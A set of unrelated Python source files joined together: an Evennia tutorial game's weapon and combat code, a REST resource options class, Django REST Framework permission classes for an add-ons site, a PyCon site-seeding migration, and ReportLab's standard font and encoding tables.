            ostring = "%s slash at %s with %s. " % (self.caller.key, target.key, self.obj.key)
            self.caller.db.combat_parry_mode = False
        else:
            self.caller.msg("You fumble with your weapon, unsure of whether to stab, slash or parry ...")
            self.caller.location.msg_contents("%s fumbles with their weapon." % self.caller, exclude=self.caller)
            self.caller.db.combat_parry_mode = False
            return
        if target.db.combat_parry_mode:
            # target is defensive; even harder to hit!
            target.msg("{GYou defend, trying to avoid the attack.{n")
            hit *= 0.5
        if random.random() <= hit:
            self.caller.msg(string + "{gIt's a hit!{n")
            target.msg(tstring + "{rIt's a hit!{n")
            self.caller.location.msg_contents(ostring + "It's a hit!", exclude=[target, self.caller])
            # call enemy hook
            if hasattr(target, "at_hit"):
                # should return True if target is defeated, False otherwise.
                return target.at_hit(self.obj, self.caller, damage)
            elif target.db.health:
                target.db.health -= damage
            else:
                # sorry, impossible to fight this enemy ...
                # BUGFIX: corrected typo "unaffacted" in player-facing message.
                self.caller.msg("The enemy seems unaffected.")
                return False
        else:
            self.caller.msg(string + "{rYou miss.{n")
            target.msg(tstring + "{gThey miss you.{n")
            self.caller.location.msg_contents(ostring + "They miss.", exclude=[target, self.caller])
class CmdSetWeapon(CmdSet):
    """Command set holding the attack command."""

    def at_cmdset_creation(self):
        """Populate the cmdset at first object creation."""
        self.add(CmdAttack())
class Weapon(TutorialObject):
    """
    This defines a bladed weapon.
    Important attributes (set at creation):
        hit - chance to hit (0-1)
        parry - chance to parry (0-1)
        damage - base damage given (modified by hit success and
                 type of attack) (0-10)
    """

    def at_object_creation(self):
        """Set default combat stats and attach the attack command."""
        super(Weapon, self).at_object_creation()
        self.db.hit = 0.4      # hit chance
        self.db.parry = 0.8    # parry chance
        self.db.damage = 1.0
        self.db.magic = False
        self.cmdset.add_default(CmdSetWeapon, permanent=True)

    def reset(self):
        """
        When reset, the weapon is simply deleted, unless it has a place
        to return to.
        """
        carried_from_home = self.location.has_player and self.home == self.location
        if not carried_from_home:
            # send the weapon back to wherever it came from
            self.location = self.home
            return
        self.location.msg_contents("%s suddenly and magically fades into nothingness, as if it was never there ..." % self.key)
        self.delete()
# Spawner prototypes for the weapons handed out by WeaponRack. Entries
# inherit from each other via the "prototype" key; stats are hit/parry
# chances (0-1) and base damage. BUGFIX: corrected two typos in the
# player-facing desc strings ("covered i food grease", "The Hawblade").
WEAPON_PROTOTYPES = {
    "weapon": {
        "typeclass": "evennia.contrib.tutorial_world.objects.Weapon",
        "key": "Weapon",
        "hit": 0.2,
        "parry": 0.2,
        "damage": 1.0,
        "magic": False,
        "desc": "A generic blade."},
    "knife": {
        "prototype": "weapon",
        "aliases": "sword",
        "key": "Kitchen knife",
        "desc": "A rusty kitchen knife. Better than nothing.",
        "damage": 3},
    "dagger": {
        "prototype": "knife",
        "key": "Rusty dagger",
        "aliases": ["knife", "dagger"],
        "desc": "A double-edged dagger with a nicked edge and a wooden handle.",
        "hit": 0.25},
    "sword": {
        "prototype": "weapon",
        "key": "Rusty sword",
        "aliases": ["sword"],
        "desc": "A rusty shortsword. It has a leather-wrapped handle covered in food grease.",
        "hit": 0.3,
        "damage": 5,
        "parry": 0.5},
    "club": {
        "prototype": "weapon",
        "key": "Club",
        "desc": "A heavy wooden club, little more than a heavy branch.",
        "hit": 0.4,
        "damage": 6,
        "parry": 0.2},
    "axe": {
        "prototype": "weapon",
        "key": "Axe",
        "desc": "A woodcutter's axe with a keen edge.",
        "hit": 0.4,
        "damage": 6,
        "parry": 0.2},
    "ornate longsword": {
        "prototype": "sword",
        "key": "Ornate longsword",
        "desc": "A fine longsword with some swirling patterns on the handle.",
        "hit": 0.5,
        "magic": True,
        "damage": 5},
    "warhammer": {
        "prototype": "club",
        "key": "Silver Warhammer",
        "aliases": ["hammer", "warhammer", "war"],
        "desc": "A heavy war hammer with silver ornaments. This huge weapon causes massive damage - if you can hit.",
        "hit": 0.4,
        "magic": True,
        "damage": 8},
    "rune axe": {
        "prototype": "axe",
        "key": "Runeaxe",
        "aliases": ["axe"],
        "hit": 0.4,
        "magic": True,
        "damage": 6},
    "thruning": {
        "prototype": "ornate longsword",
        "key": "Broadsword named Thruning",
        "desc": "This heavy bladed weapon is marked with the name 'Thruning'. It is very powerful in skilled hands.",
        "hit": 0.6,
        "parry": 0.6,
        "damage": 7},
    "slayer waraxe": {
        "prototype": "rune axe",
        "key": "Slayer waraxe",
        "aliases": ["waraxe", "war", "slayer"],
        "desc": "A huge double-bladed axe marked with the runes for 'Slayer'. It has more runic inscriptions on its head, which you cannot decipher.",
        "hit": 0.7,
        "damage": 8},
    "ghostblade": {
        "prototype": "ornate longsword",
        "key": "The Ghostblade",
        "aliases": ["blade", "ghost"],
        "desc": "This massive sword is large as you are tall, yet seems to weigh almost nothing. It's almost like it's not really there.",
        "hit": 0.9,
        "parry": 0.8,
        "damage": 10},
    "hawkblade": {
        "prototype": "ghostblade",
        "key": "The Hawkblade",
        "aliases": ["hawk", "blade"],
        "desc": "The weapon of a long-dead heroine and a more civilized age, the hawk-shaped hilt of this blade almost has a life of its own.",
        "hit": 0.85,
        "parry": 0.7,
        "damage": 11}
}
class CmdGetWeapon(Command):
    """
    Usage:
      get weapon
    This will try to obtain a weapon from the container.
    """
    key = "get weapon"
    aliases = "get weapon"
    locks = "cmd:all()"
    # BUGFIX: attribute was misspelled "help_cateogory", so the command
    # fell into the default help category instead of TutorialWorld.
    help_category = "TutorialWorld"

    def func(self):
        """
        Get a weapon from the container. It will
        itself handle all messages.
        """
        self.obj.produce_weapon(self.caller)
class CmdSetWeaponRack(CmdSet):
    """
    The cmdset for the rack.
    """
    key = "weaponrack_cmdset"

    def at_cmdset_creation(self):
        """Populate the cmdset at first creation."""
        self.add(CmdGetWeapon())
class WeaponRack(TutorialObject):
    """
    This object represents a weapon store. When people use the
    "get weapon" command on this rack, it will produce one
    random weapon from among those registered to exist
    on it. This will also set a property on the character
    to make sure they can't get more than one at a time.
    Attributes to set on this object:
        available_weapons: list of prototype-keys from
            WEAPON_PROTOTYPES, the weapons available in this rack.
        no_more_weapons_msg - error message to return to players
            who already got one weapon from the rack and tries to
            grab another one.
    """

    def at_object_creation(self):
        """Set up the rack's command set and default Attributes."""
        self.cmdset.add_default(CmdSetWeaponRack, permanent=True)
        # identifies this rack; used as the tag marking who already drew
        self.db.rack_id = "weaponrack_1"
        # these are prototype names from the prototype
        # dictionary above.
        self.db.get_weapon_msg = "You find {c%s{n."
        self.db.no_more_weapons_msg = "you find nothing else of use."
        self.db.available_weapons = ["knife", "dagger",
                                     "sword", "club"]

    def produce_weapon(self, caller):
        """
        This will produce a new weapon from the rack,
        assuming the caller hasn't already gotten one. When
        doing so, the caller will get Tagged with the id
        of this rack, to make sure they cannot keep
        pulling weapons from it indefinitely.
        """
        rack_id = self.db.rack_id
        if caller.tags.get(rack_id, category="tutorial_world"):
            # this caller already drew from this rack
            caller.msg(self.db.no_more_weapons_msg)
            return
        chosen = random.choice(self.db.available_weapons)
        # spawn a new Weapon from the prototype dictionary and mark the
        # caller with the rack's tag
        weapon = spawn(WEAPON_PROTOTYPES[chosen], prototype_parents=WEAPON_PROTOTYPES)[0]
        caller.tags.add(rack_id, category="tutorial_world")
        weapon.location = caller
        caller.msg(self.db.get_weapon_msg % weapon.key)
|
class ResourceOptions(object):
    """
    A configuration class for ``Resource``.
    Provides sane defaults and the logic needed to augment these settings with
    the internal ``class Meta`` used on ``Resource`` subclasses.
    """
    allowed_methods = ['get', 'post', 'put', 'delete', 'patch']
    list_allowed_methods = None
    detail_allowed_methods = None
    urlconf_namespace = None
    default_format = 'application/json'
    filtering = {}
    ordering = []
    object_class = None
    queryset = None
    fields = []
    excludes = []
    include_resource_uri = True
    include_absolute_url = False
    always_return_data = False
    api_name = None
    resource_name = None
    resp_message = 'Good!'
    resp_script = None
    resp_success = True
    resp_template = 'adminpanel/ap-test.html'
    resp_type = 'tpl'
    resp_render_data = None
    make_function = None

    def __new__(cls, meta=None):
        # Collect every non-underscore attribute of the supplied Meta
        # class as an override of the defaults above.
        overrides = {}
        if meta:
            overrides = {
                name: getattr(meta, name)
                for name in dir(meta)
                if not name.startswith('_')
            }
        # Unless set explicitly (and non-None), the list/detail method
        # whitelists fall back to the general allowed_methods setting.
        allowed = overrides.get('allowed_methods', ['get', 'post', 'put', 'delete', 'patch'])
        if overrides.get('list_allowed_methods') is None:
            overrides['list_allowed_methods'] = allowed
        if overrides.get('detail_allowed_methods') is None:
            overrides['detail_allowed_methods'] = allowed
        # Return an instance of a one-off subclass carrying the overrides
        # as class attributes.
        return object.__new__(type('ResourceOptions', (cls,), overrides))
|
from rest_framework.exceptions import MethodNotAllowed
from rest_framework.permissions import SAFE_METHODS, BasePermission
from olympia.amo import permissions
from olympia.access import acl
class GroupPermission(BasePermission):
    """
    Allow access depending on the result of action_allowed_user().
    """

    def __init__(self, permission):
        self.permission = permission

    def has_permission(self, request, view):
        # anonymous users can never hold a group permission
        if not request.user.is_authenticated:
            return False
        return acl.action_allowed_user(request.user, self.permission)

    def has_object_permission(self, request, view, obj):
        # object-level access mirrors the view-level check
        return self.has_permission(request, view)

    def __call__(self, *a):
        """
        ignore DRF's nonsensical need to call this object.
        """
        return self
class AnyOf(BasePermission):
    """
    Takes multiple permission objects and succeeds if any single one does.
    """

    def __init__(self, *perms):
        # Instantiate each sub-permission up front, like DRF does with
        # the classes in permission_classes.
        self.perms = [perm_class() for perm_class in perms]

    def has_permission(self, request, view):
        return any(perm.has_permission(request, view)
                   for perm in self.perms)

    def has_object_permission(self, request, view, obj):
        # `has_permission` must be re-checked for each sub-permission,
        # because the default `has_object_permission` implementation
        # returns True unconditionally and some permission objects do
        # not override it.
        return any(perm.has_permission(request, view) and
                   perm.has_object_permission(request, view, obj)
                   for perm in self.perms)

    def __call__(self):
        # DRF instantiates permission classes; we are already an instance.
        return self
class AllOf(BasePermission):
    """
    Takes multiple permission objects and succeeds if all of them do.
    """

    def __init__(self, *perms):
        # Instantiate each sub-permission up front, like DRF does with
        # the classes in permission_classes.
        self.perms = [perm_class() for perm_class in perms]

    def has_permission(self, request, view):
        return all(perm.has_permission(request, view)
                   for perm in self.perms)

    def has_object_permission(self, request, view, obj):
        # `has_permission` must be re-checked for each sub-permission,
        # because the default `has_object_permission` implementation
        # returns True unconditionally and some permission objects do
        # not override it.
        return all(perm.has_permission(request, view) and
                   perm.has_object_permission(request, view, obj)
                   for perm in self.perms)

    def __call__(self):
        # DRF instantiates permission classes; we are already an instance.
        return self
class AllowNone(BasePermission):
    """Deny all access, at both the view and the object level."""

    def has_permission(self, request, view):
        return False

    def has_object_permission(self, request, view, obj):
        return False
class AllowAddonAuthor(BasePermission):
    """Allow access if the user is in the object authors."""

    def has_permission(self, request, view):
        # the real check happens per-object; just require authentication
        return request.user.is_authenticated

    def has_object_permission(self, request, view, obj):
        # the user must be one of the add-on's authors
        return obj.authors.filter(pk=request.user.pk).exists()
class AllowOwner(BasePermission):
    """
    Permission class to use when you are dealing with a model instance that has
    a "user" FK pointing to an UserProfile, and you want only the corresponding
    user to be able to access your instance.
    """

    def has_permission(self, request, view):
        return request.user.is_authenticated

    def has_object_permission(self, request, view, obj):
        # the object is either the user themselves, or something whose
        # `user` FK points at them
        return (obj == request.user or
                getattr(obj, 'user', None) == request.user)
class AllowNotOwner(AllowOwner):
    """
    Inverse of AllowOwner: for a model instance with a "user" FK pointing
    to an UserProfile, allow any authenticated user EXCEPT the instance's
    owner (or the user themselves) to access it.
    """
    def has_object_permission(self, request, view, obj):
        # negate the parent's owner check; view-level auth requirement
        # is inherited unchanged from AllowOwner.
        return not super().has_object_permission(request, view, obj)
class AllowReviewer(BasePermission):
    """Allow reviewers to access add-ons with listed versions.
    The user logged in must either be making a read-only request and have the
    'ReviewerTools:View' permission, or simply be a reviewer or admin.
    The definition of an add-on reviewer depends on the object:
    - For static themes, it's someone with 'Addons:ThemeReview'
    - For personas, it's someone with 'Personas:Review'
    - For the rest of the add-ons, is someone who has either
      'Addons:Review', 'Addons:PostReview' or 'Addons:ContentReview'
      permission.
    """

    def has_permission(self, request, view):
        return request.user.is_authenticated

    def has_object_permission(self, request, view, obj):
        # read-only access with the reviewer-tools-view permission ...
        is_read_only_viewer = (
            request.method in SAFE_METHODS and
            acl.action_allowed(request, permissions.REVIEWER_TOOLS_VIEW))
        # ... or a real reviewer for an add-on that has listed versions
        is_listed_reviewer = (
            obj.has_listed_versions() and acl.is_reviewer(request, obj))
        return is_read_only_viewer or is_listed_reviewer
class AllowReviewerUnlisted(AllowReviewer):
    """Allow unlisted reviewers to access add-ons with unlisted versions, or
    add-ons with no listed versions at all.
    Like reviewers.decorators.unlisted_addons_reviewer_required, but as a
    permission class and not a decorator.
    The user logged in must an unlisted add-on reviewer or admin.
    An unlisted add-on reviewer is someone who is in the group with the
    following permission: 'Addons:ReviewUnlisted'.
    """

    def has_permission(self, request, view):
        return acl.check_unlisted_addons_reviewer(request)

    def has_object_permission(self, request, view, obj):
        # the add-on must be unlisted (or have no listed versions at all)
        targets_unlisted = (
            obj.has_unlisted_versions() or not obj.has_listed_versions())
        return targets_unlisted and self.has_permission(request, view)
class AllowAnyKindOfReviewer(BasePermission):
    """Allow access to any kind of reviewer. Use only for views that don't
    alter add-on data.
    Allows access to users with any of those permissions:
    - ReviewerTools:View
    - Addons:Review
    - Addons:ReviewUnlisted
    - Addons:ContentReview
    - Addons:PostReview
    - Personas:Review
    Uses acl.is_user_any_kind_of_reviewer() behind the scenes.
    See also any_reviewer_required() decorator.
    """

    def has_permission(self, request, view):
        return acl.is_user_any_kind_of_reviewer(request.user)

    def has_object_permission(self, request, view, obj):
        # no per-object distinction; defer to the view-level check
        return self.has_permission(request, view)
class AllowIfPublic(BasePermission):
    """Grant access whenever the target object reports itself public via
    its is_public() method."""

    def has_permission(self, request, view):
        # No view-level restriction; the decision is per-object.
        return True

    def has_object_permission(self, request, view, obj):
        # is_public() is consulted first, mirroring the original
        # evaluation order.
        if not obj.is_public():
            return False
        return self.has_permission(request, view)
class AllowReadOnlyIfPublic(AllowIfPublic):
    """Like AllowIfPublic, but additionally restricted to safe
    (GET/OPTIONS/HEAD) HTTP methods."""

    def has_permission(self, request, view):
        http_method = request.method
        return http_method in SAFE_METHODS
class ByHttpMethod(BasePermission):
    """Dispatch the permission check to a different permission class per
    HTTP method.

    ``method_permissions`` maps lowercase HTTP method names to permission
    classes (uninstantiated, as DRF expects them). A method with no entry
    raises MethodNotAllowed. Warning: on a CORS-enabled endpoint you
    probably want an AllowAny entry for 'options'.
    """

    def __init__(self, method_permissions):
        # Instantiate each permission up front, the way DRF would.
        self.method_permissions = {
            name: perm_class()
            for name, perm_class in method_permissions.items()}

    def _permission_for(self, request):
        # Resolve the permission instance for this request's method, or
        # reject the method outright.
        method_name = request.method.lower()
        if method_name not in self.method_permissions:
            raise MethodNotAllowed(request.method)
        return self.method_permissions[method_name]

    def has_permission(self, request, view):
        return self._permission_for(request).has_permission(request, view)

    def has_object_permission(self, request, view, obj):
        permission = self._permission_for(request)
        return permission.has_object_permission(request, view, obj)

    def __call__(self):
        # DRF instantiates permission classes; this instance is already
        # configured, so hand itself back.
        return self
class AllowRelatedObjectPermissions(BasePermission):
    """Run a set of permissions against an object reachable through an
    attribute of the checked object.

    ``related_property`` names the attribute holding the related object;
    ``related_permissions`` lists permission classes that must all pass
    (standard DRF semantics).
    """

    def __init__(self, related_property, related_permissions):
        self.perms = [perm_class() for perm_class in related_permissions]
        self.related_property = related_property

    def has_permission(self, request, view):
        # Every permission must grant view-level access; stop at the
        # first refusal (same short-circuit as all()).
        for perm in self.perms:
            if not perm.has_permission(request, view):
                return False
        return True

    def has_object_permission(self, request, view, obj):
        related_obj = getattr(obj, self.related_property)
        for perm in self.perms:
            if not perm.has_object_permission(request, view, related_obj):
                return False
        return True

    def __call__(self):
        # Already instantiated and configured; return self when DRF
        # "instantiates" us.
        return self
class PreventActionPermission(BasePermission):
    """Deny access for the given view action(s); allow everything else."""

    def __init__(self, actions):
        # A single action may be passed bare; containers are stored as-is.
        if isinstance(actions, (list, tuple)):
            self.actions = actions
        else:
            self.actions = [actions]

    def has_permission(self, request, view):
        current_action = getattr(view, 'action', '')
        return current_action not in self.actions

    def has_object_permission(self, request, view, obj):
        # Object-level access is unrestricted; only the action matters.
        return True

    def __call__(self, *a):
        """Ignore DRF's need to call this object; return self unchanged."""
        return self
|
from __future__ import unicode_literals
from django.db import models, migrations
def create_site(apps, schema_editor):
    """Ensure the default django.contrib.sites Site (pk=1) exists.

    Uses the versioned app registry (``apps.get_model``) instead of a
    direct import so the historical model state is respected, and writes
    through the migration's database alias so multi-database setups hit
    the right database.
    """
    Site = apps.get_model('sites', 'Site')
    db_alias = schema_editor.connection.alias
    # get_or_create already keys on pk=1; repeating "pk" inside defaults
    # was redundant, so defaults only carry the remaining fields.
    Site.objects.using(db_alias).get_or_create(
        pk=1,
        defaults={
            "domain": "us.pycon.org",
            "name": "PyCon 2017",
        },
    )
class Migration(migrations.Migration):
    """Data migration: seed the default Site record for the project."""

    dependencies = [
        ('conference', '0001_initial'),
        ('sites', '0001_initial'),
    ]

    operations = [
        # Provide a no-op reverse so the migration can be unapplied;
        # leaving the Site row in place on rollback is harmless.
        migrations.RunPython(create_site, migrations.RunPython.noop),
    ]
|
__version__=''' $Id: _fontdata.py 3052 2007-03-07 14:04:49Z rgbecker $ '''
__doc__="""
database of font related things
standardFonts tuple of the 14 standard string font names
standardEncodings tuple of the known standard font names
encodings a mapping object from standard encoding names (and minor variants)
to the encoding vectors ie the tuple of string glyph names
widthsByFontGlyph fontname x glyphname --> width of glyph
widthVectorsByFont fontName -> vector of widths
"""
import UserDict, os, sys
# fontName -> vector of glyph widths (see module docstring).
widthVectorsByFont = {}
# Registries keyed by font name / base encoding; empty at this point —
# NOTE(review): presumably populated elsewhere in the package, confirm.
fontsByName = {}
fontsByBaseEnc = {}
# The 14 standard Type-1 font names (see module docstring).
standardFonts = (
    'Courier', 'Courier-Bold', 'Courier-Oblique', 'Courier-BoldOblique',
    'Helvetica', 'Helvetica-Bold', 'Helvetica-Oblique', 'Helvetica-BoldOblique',
    'Times-Roman', 'Times-Bold', 'Times-Italic', 'Times-BoldItalic',
    'Symbol','ZapfDingbats')
# Standard font name -> (family name, bold flag, italic flag).
standardFontAttributes = {
    #family, bold, italic defined for basic ones
    'Courier':('Courier',0,0),
    'Courier-Bold':('Courier',1,0),
    'Courier-Oblique':('Courier',0,1),
    'Courier-BoldOblique':('Courier',1,1),
    'Helvetica':('Helvetica',0,0),
    'Helvetica-Bold':('Helvetica',1,0),
    'Helvetica-Oblique':('Helvetica',0,1),
    'Helvetica-BoldOblique':('Helvetica',1,1),
    'Times-Roman':('Times-Roman',0,0),
    'Times-Bold':('Times-Roman',1,0),
    'Times-Italic':('Times-Roman',0,1),
    'Times-BoldItalic':('Times-Roman',1,1),
    'Symbol':('Symbol',0,0),
    'ZapfDingbats':('ZapfDingbats',0,0)
    }
# Lowercased standard font name -> 8-character font file basename used on
# win32 (fed to _searchT1Dirs/findT1File with an extension appended).
_font2fnrMapWin32 = {
    'symbol':                   'Sy______',
    'zapfdingbats':             'Zd______',
    'helvetica':                '_a______',
    'helvetica-bold':           '_ab_____',
    'helvetica-boldoblique':    '_abi____',
    'helvetica-oblique':        '_ai_____',
    'times-bold':               '_eb_____',
    'times-bolditalic':         '_ebi____',
    'times-italic':             '_ei_____',
    'times-roman':              '_er_____',
    'courier-bold':             'cob_____',
    'courier-boldoblique':      'cobo____',
    'courier':                  'com_____',
    'courier-oblique':          'coo_____',
    }
# Pick the name->file-root map for this platform.
if sys.platform in ('linux2',):
    # On linux the Type-1 files carry full substitute-font names.
    _font2fnrMapLinux2 = {
        'symbol': 'Symbol',
        'zapfdingbats': 'ZapfDingbats',
        'helvetica': 'Arial',
        'helvetica-bold': 'Arial-Bold',
        'helvetica-boldoblique': 'Arial-BoldItalic',
        'helvetica-oblique': 'Arial-Italic',
        'times-bold': 'TimesNewRoman-Bold',
        'times-bolditalic':'TimesNewRoman-BoldItalic',
        'times-italic': 'TimesNewRoman-Italic',
        'times-roman': 'TimesNewRoman',
        'courier-bold': 'Courier-Bold',
        'courier-boldoblique': 'Courier-BoldOblique',
        'courier': 'Courier',
        'courier-oblique': 'Courier-Oblique',
        }
    _font2fnrMap = _font2fnrMapLinux2
    # Also index the win32 map by the lowercased linux file names so the
    # win32-style fallback in findT1File still resolves on linux.
    for k, v in _font2fnrMap.items():
        if k in _font2fnrMapWin32.keys():
            _font2fnrMapWin32[v.lower()] = _font2fnrMapWin32[k]
    del k, v
else:
    _font2fnrMap = _font2fnrMapWin32
def _findFNR(fontName):
    """Map a standard font name (case-insensitive) to its platform file
    name root via the active _font2fnrMap; raises KeyError if unknown."""
    key = fontName.lower()
    return _font2fnrMap[key]
from reportlab.rl_config import T1SearchPath
from reportlab.lib.utils import rl_isfile
def _searchT1Dirs(n, rl_isfile=rl_isfile, T1SearchPath=T1SearchPath):
    """Return the first existing file named ``n`` under the Type-1 search
    path directories, or None if absent.

    ``rl_isfile`` and ``T1SearchPath`` are captured as default arguments
    on purpose: the module-level names are deleted right after this
    definition, and locals are cheaper to look up.
    """
    assert T1SearchPath != [], "No Type-1 font search path"
    for directory in T1SearchPath:
        candidate = os.path.join(directory, n)
        if rl_isfile(candidate):
            return candidate
    return None
# The function above captured these as default args; drop the
# module-level names to keep the namespace clean.
del T1SearchPath, rl_isfile
def findT1File(fontName, ext='.pfb'):
    """Locate the Type-1 font file for ``fontName`` on the search path.

    On linux (for .pfb requests) the extension-less platform name is
    tried first, then the win32-style basename with ``ext``; the final
    attempt uses the primary map with ``ext`` appended and lets any
    lookup failure propagate to the caller.
    """
    if sys.platform in ('linux2',) and ext == '.pfb':
        try:
            f = _searchT1Dirs(_findFNR(fontName))
            if f:
                return f
        # Was a bare except: only an unknown font name (KeyError) or an
        # empty search path (AssertionError) can arise here; anything
        # else should not be silenced.
        except (KeyError, AssertionError):
            pass
    try:
        f = _searchT1Dirs(_font2fnrMapWin32[fontName.lower()] + ext)
        if f:
            return f
    except (KeyError, AssertionError):
        pass
    return _searchT1Dirs(_findFNR(fontName) + ext)
# Canonical names of the encoding vectors installed in `encodings` below.
standardEncodings = ('WinAnsiEncoding','MacRomanEncoding','StandardEncoding','SymbolEncoding','ZapfDingbatsEncoding','PDFDocEncoding', 'MacExpertEncoding')
class _Name2StandardEncodingMap(UserDict.UserDict):
    '''Trivial fake dictionary with some [] magic: keys are canonicalized
    (case-insensitive, optional "encoding" suffix stripped, then mapped
    through _XMap), and re-assigning an existing encoding raises
    IndexError.'''
    _XMap = {'winansi':'WinAnsiEncoding','macroman': 'MacRomanEncoding','standard':'StandardEncoding','symbol':'SymbolEncoding', 'zapfdingbats':'ZapfDingbatsEncoding','pdfdoc':'PDFDocEncoding', 'macexpert':'MacExpertEncoding'}

    def __setitem__(self, x, v):
        """Store v under the canonical name for x; IndexError on rebind."""
        y = x.lower()
        if y[-8:] == 'encoding':
            y = y[:-8]
        y = self._XMap[y]
        # Call-form raise replaces the Python-2-only `raise E, msg`
        # statement; behavior is identical.
        if y in self.keys():
            raise IndexError('Encoding %s is already set' % y)
        self.data[y] = v

    def __getitem__(self, x):
        """Fetch the value stored under the canonical name for x."""
        y = x.lower()
        if y[-8:] == 'encoding':
            y = y[:-8]
        y = self._XMap[y]
        return self.data[y]
# Singleton mapping: canonical encoding name -> tuple of 256 glyph names
# (None for unassigned code points); filled in by the assignments below.
encodings = _Name2StandardEncodingMap()
encodings['WinAnsiEncoding'] = (
None, None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, 'space', 'exclam',
'quotedbl', 'numbersign', 'dollar', 'percent', 'ampersand',
'quotesingle', 'parenleft', 'parenright', 'asterisk', 'plus', 'comma',
'hyphen', 'period', 'slash', 'zero', 'one', 'two', 'three', 'four',
'five', 'six', 'seven', 'eight', 'nine', 'colon', 'semicolon', 'less',
'equal', 'greater', 'question', 'at', 'A', 'B', 'C', 'D', 'E', 'F',
'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',
'U', 'V', 'W', 'X', 'Y', 'Z', 'bracketleft', 'backslash', 'bracketright',
'asciicircum', 'underscore', 'grave', 'a', 'b', 'c', 'd', 'e', 'f',
'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
'u', 'v', 'w', 'x', 'y', 'z', 'braceleft', 'bar', 'braceright',
'asciitilde', 'bullet', 'Euro', 'bullet', 'quotesinglbase', 'florin',
'quotedblbase', 'ellipsis', 'dagger', 'daggerdbl', 'circumflex',
'perthousand', 'Scaron', 'guilsinglleft', 'OE', 'bullet', 'Zcaron',
'bullet', 'bullet', 'quoteleft', 'quoteright', 'quotedblleft',
'quotedblright', 'bullet', 'endash', 'emdash', 'tilde', 'trademark',
'scaron', 'guilsinglright', 'oe', 'bullet', 'zcaron', 'Ydieresis',
'space', 'exclamdown', 'cent', 'sterling', 'currency', 'yen', 'brokenbar',
'section', 'dieresis', 'copyright', 'ordfeminine', 'guillemotleft',
'logicalnot', 'hyphen', 'registered', 'macron', 'degree', 'plusminus',
'twosuperior', 'threesuperior', 'acute', 'mu', 'paragraph', 'periodcentered',
'cedilla', 'onesuperior', 'ordmasculine', 'guillemotright', 'onequarter',
'onehalf', 'threequarters', 'questiondown', 'Agrave', 'Aacute',
'Acircumflex', 'Atilde', 'Adieresis', 'Aring', 'AE', 'Ccedilla',
'Egrave', 'Eacute', 'Ecircumflex', 'Edieresis', 'Igrave', 'Iacute',
'Icircumflex', 'Idieresis', 'Eth', 'Ntilde', 'Ograve', 'Oacute',
'Ocircumflex', 'Otilde', 'Odieresis', 'multiply', 'Oslash', 'Ugrave',
'Uacute', 'Ucircumflex', 'Udieresis', 'Yacute', 'Thorn', 'germandbls',
'agrave', 'aacute', 'acircumflex', 'atilde', 'adieresis', 'aring', 'ae',
'ccedilla', 'egrave', 'eacute', 'ecircumflex', 'edieresis', 'igrave',
'iacute', 'icircumflex', 'idieresis', 'eth', 'ntilde', 'ograve', 'oacute',
'ocircumflex', 'otilde', 'odieresis', 'divide', 'oslash', 'ugrave', 'uacute',
'ucircumflex', 'udieresis', 'yacute', 'thorn', 'ydieresis')
encodings['MacRomanEncoding'] = (
None, None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, 'space', 'exclam',
'quotedbl', 'numbersign', 'dollar', 'percent', 'ampersand',
'quotesingle', 'parenleft', 'parenright', 'asterisk', 'plus', 'comma',
'hyphen', 'period', 'slash', 'zero', 'one', 'two', 'three', 'four',
'five', 'six', 'seven', 'eight', 'nine', 'colon', 'semicolon', 'less',
'equal', 'greater', 'question', 'at', 'A', 'B', 'C', 'D', 'E', 'F',
'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',
'U', 'V', 'W', 'X', 'Y', 'Z', 'bracketleft', 'backslash', 'bracketright',
'asciicircum', 'underscore', 'grave', 'a', 'b', 'c', 'd', 'e', 'f',
'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
'u', 'v', 'w', 'x', 'y', 'z', 'braceleft', 'bar', 'braceright',
'asciitilde', None, 'Adieresis', 'Aring', 'Ccedilla', 'Eacute',
'Ntilde', 'Odieresis', 'Udieresis', 'aacute', 'agrave', 'acircumflex',
'adieresis', 'atilde', 'aring', 'ccedilla', 'eacute', 'egrave',
'ecircumflex', 'edieresis', 'iacute', 'igrave', 'icircumflex',
'idieresis', 'ntilde', 'oacute', 'ograve', 'ocircumflex', 'odieresis',
'otilde', 'uacute', 'ugrave', 'ucircumflex', 'udieresis', 'dagger',
'degree', 'cent', 'sterling', 'section', 'bullet', 'paragraph',
'germandbls', 'registered', 'copyright', 'trademark', 'acute',
'dieresis', None, 'AE', 'Oslash', None, 'plusminus', None, None, 'yen',
'mu', None, None, None, None, None, 'ordfeminine', 'ordmasculine', None,
'ae', 'oslash', 'questiondown', 'exclamdown', 'logicalnot', None, 'florin',
None, None, 'guillemotleft', 'guillemotright', 'ellipsis', 'space', 'Agrave',
'Atilde', 'Otilde', 'OE', 'oe', 'endash', 'emdash', 'quotedblleft',
'quotedblright', 'quoteleft', 'quoteright', 'divide', None, 'ydieresis',
'Ydieresis', 'fraction', 'currency', 'guilsinglleft', 'guilsinglright',
'fi', 'fl', 'daggerdbl', 'periodcentered', 'quotesinglbase',
'quotedblbase', 'perthousand', 'Acircumflex', 'Ecircumflex', 'Aacute',
'Edieresis', 'Egrave', 'Iacute', 'Icircumflex', 'Idieresis', 'Igrave',
'Oacute', 'Ocircumflex', None, 'Ograve', 'Uacute', 'Ucircumflex',
'Ugrave', 'dotlessi', 'circumflex', 'tilde', 'macron', 'breve',
'dotaccent', 'ring', 'cedilla', 'hungarumlaut', 'ogonek', 'caron')
encodings['SymbolEncoding']=(None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, 'space',
'exclam', 'universal', 'numbersign', 'existential', 'percent', 'ampersand', 'suchthat',
'parenleft', 'parenright', 'asteriskmath', 'plus', 'comma', 'minus', 'period', 'slash', 'zero',
'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'colon', 'semicolon',
'less', 'equal', 'greater', 'question', 'congruent', 'Alpha', 'Beta', 'Chi', 'Delta', 'Epsilon',
